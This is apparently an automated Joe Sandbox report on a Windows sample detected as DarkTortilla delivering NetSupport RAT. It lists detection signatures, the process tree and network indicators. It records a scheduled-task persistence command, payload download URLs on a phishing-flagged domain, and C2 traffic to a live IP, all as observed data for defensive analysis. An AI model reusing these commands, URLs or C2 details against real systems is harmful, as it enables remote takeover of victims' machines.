Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Jjv9ha2GKn.exe

Overview

General Information

Sample name:Jjv9ha2GKn.exe
renamed because original name is a hash value
Original sample name:6ba3976f8956dceb2903dc89b9b66c3d81ceb93566b6244b58c4929a454815c0.exe
Analysis ID:1572207
MD5:aedf7f67cf6d7f8ef348ba681046fe51
SHA1:707ac1c67e2d569613c1b5cc3f809d6bd3cddc26
SHA256:6ba3976f8956dceb2903dc89b9b66c3d81ceb93566b6244b58c4929a454815c0
Tags:DarkTortillaexeganeres1-comganeres2-comnetsupportuser-JAMESWT_MHT
Infos:

Detection

NetSupport RAT, DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • Jjv9ha2GKn.exe (PID: 6512 cmdline: "C:\Users\user\Desktop\Jjv9ha2GKn.exe" MD5: AEDF7F67CF6D7F8EF348BA681046FE51)
    • AddInProcess32.exe (PID: 2972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • schtasks.exe (PID: 6308 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 1536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 828 cmdline: C:\Users\user\AppData\Local\DNScache\client32.exe MD5: 9497AECE91E1CCC495CA26AE284600B9)
  • client32.exe (PID: 6044 cmdline: C:\Users\user\AppData\Local\DNScache\client32.exe MD5: 9497AECE91E1CCC495CA26AE284600B9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\DNScache\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Local\DNScache\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Local\DNScache\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Local\DNScache\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Local\DNScache\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 3 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000007.00000002.3301652835.00000000004D1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 11 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      9.2.client32.exe.6f6f0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        7.0.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          7.2.client32.exe.6ceb0000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            9.0.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              9.2.client32.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 14 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Suspicious Schtasks From Env Var Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 2972, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST, ProcessId: 6308, ProcessName: schtasks.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-10T08:58:24.482566+010028033053Unknown Traffic192.168.2.54983123.254.224.41443TCP
                                2024-12-10T08:58:26.643824+010028033053Unknown Traffic192.168.2.54983723.254.224.41443TCP
                                2024-12-10T08:58:31.227150+010028033053Unknown Traffic192.168.2.54985123.254.224.41443TCP
                                2024-12-10T08:58:33.561114+010028033053Unknown Traffic192.168.2.54985723.254.224.41443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-10T08:57:08.084054+010028277451Malware Command and Control Activity Detected192.168.2.54986588.210.12.583785TCP
                                2024-12-10T08:58:37.212776+010028277451Malware Command and Control Activity Detected192.168.2.54986588.210.12.583785TCP
                                2024-12-10T08:58:37.654624+010028277451Malware Command and Control Activity Detected192.168.2.54986588.210.12.583785TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: Jjv9ha2GKn.exeAvira: detected
                                Antivirus detection for URL or domain
                                Source: https://cycleconf.com/dwnld/2nd2_4.zipAvira URL Cloud: Label: phishing
                                Source: https://cycleconf.com/dwnld/2nd2_1.zipAvira URL Cloud: Label: phishing
                                Source: https://cycleconf.com/dwnld/2nd2_2.zipAvira URL Cloud: Label: phishing
                                Source: https://cycleconf.com/dwnld/2nd2_3.zipAvira URL Cloud: Label: phishing
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeReversingLabs: Detection: 21%
                                Multi AV Scanner detection for submitted file
                                Source: Jjv9ha2GKn.exeReversingLabs: Detection: 47%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Machine Learning detection for sample
                                Source: Jjv9ha2GKn.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110AC600 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,7_2_110AC600
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110AC600 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,9_2_110AC600
                                Source: Jjv9ha2GKn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeFile opened: C:\Users\user\AppData\Local\DNScache\MSVCR100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 23.254.224.41:443 -> 192.168.2.5:49831 version: TLS 1.2
                                Source: Jjv9ha2GKn.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000007.00000002.3304858661.000000006CDF1000.00000020.00000001.01000000.00000011.sdmp, client32.exe, 00000009.00000002.2890200975.000000006CDF1000.00000020.00000001.01000000.00000011.sdmp, msvcr100.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.3305095577.000000006F6F2000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000009.00000002.2890449063.000000006F6F2000.00000002.00000001.01000000.0000000F.sdmp, PCICHEK.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr
                                Source: Binary string: msauserext.pdbGCTL source: msauserext.dll.4.dr
                                Source: Binary string: mscpxl32.pdb source: mscpxl32.dLL.4.dr
                                Source: Binary string: mscpxl32.pdbGCTL source: mscpxl32.dLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.4.dr
                                Source: Binary string: mscat32.pdbGCTL source: mscat32.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_1.i386.pdb source: msvcp140_1.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.4.dr
                                Source: Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: msauserext.pdb source: msauserext.dll.4.dr
                                Source: Binary string: client32_ctr.pdb source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.3305005916.000000006CEB5000.00000002.00000001.01000000.00000010.sdmp, client32.exe, 00000009.00000002.2890355521.000000006CEB5000.00000002.00000001.01000000.00000010.sdmp, pcicapi.dll.4.dr
                                Source: Binary string: mscat32.pdb source: mscat32.dll.4.dr
                                Source: Binary string: 0\1100\client32\Release\client32_ctr.pdb source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.4.dr
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_0040F905 FindFirstFileExW,4_2_0040F905
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D1B3
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_11069760
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_11123690
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_11108090
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,7_2_110BC0E0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE84
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_11064EF0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE4EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE4EFE1
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE50F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE50F84
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE4CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,7_2_6CE4CA9B
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE50B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE50B33
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE4C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,7_2_6CE4C775
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_6CE50702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE50702
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1102CD90 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102CD90
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,9_2_11069760
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,9_2_11123690
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11108090 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,9_2_11108090
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,9_2_110BC0E0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,9_2_11064EF0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 4x nop then add byte ptr [edi], dh7_2_6CE08468

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.5:49865 -> 88.210.12.58:3785
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 3785
                                Source: unknownNetwork traffic detected: HTTP traffic on port 3785 -> 49865
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 3785
                                Source: unknownNetwork traffic detected: HTTP traffic on port 3785 -> 49865
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 3785
                                Source: global trafficTCP traffic: 192.168.2.5:49865 -> 88.210.12.58:3785
                                Source: global trafficHTTP traffic detected: GET /dwnld/2nd2_1.zip HTTP/1.1Host: cycleconf.com
                                Source: global trafficHTTP traffic detected: GET /dwnld/2nd2_2.zip HTTP/1.1Host: cycleconf.com
                                Source: global trafficHTTP traffic detected: GET /dwnld/2nd2_3.zip HTTP/1.1Host: cycleconf.com
                                Source: global trafficHTTP traffic detected: GET /dwnld/2nd2_4.zip HTTP/1.1Host: cycleconf.com
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: CITYLAN-ASRU CITYLAN-ASRU
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49831 -> 23.254.224.41:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49837 -> 23.254.224.41:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49857 -> 23.254.224.41:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49851 -> 23.254.224.41:443
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_004025B0 GetProcessHeap,InternetOpenW,InternetOpenUrlW,GetProcessHeap,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlReAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlFreeHeap,InternetCloseHandle,InternetCloseHandle,4_2_004025B0
                                Source: global trafficHTTP traffic detected: GET /dwnld/2nd2_1.zip HTTP/1.1Host: cycleconf.com
                                Source: global trafficHTTP traffic detected: GET /dwnld/2nd2_2.zip HTTP/1.1Host: cycleconf.com
                                Source: global trafficHTTP traffic detected: GET /dwnld/2nd2_3.zip HTTP/1.1Host: cycleconf.com
                                Source: global trafficHTTP traffic detected: GET /dwnld/2nd2_4.zip HTTP/1.1Host: cycleconf.com
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: cycleconf.com
                                Source: global trafficDNS traffic detected: DNS query: ganeres1.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 88.210.12.58Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: client32.exe, client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exe, client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.drString found in binary or memory: http://%s/testpage.htm
                                Source: client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: client32.exe, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drString found in binary or memory: http://127.0.0.1
                                Source: client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: client32.exe, 00000007.00000002.3304017965.0000000005860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://88.210.12.58/fakeurl.htm
                                Source: TCCTL32.DLL.4.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0P
                                Source: remcmdstub.exe.4.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesignsha2g2.crl0
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                                Source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0N
                                Source: remcmdstub.exe.4.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                                Source: TCCTL32.DLL.4.drString found in binary or memory: http://crl.globalsign.net/root.crl0
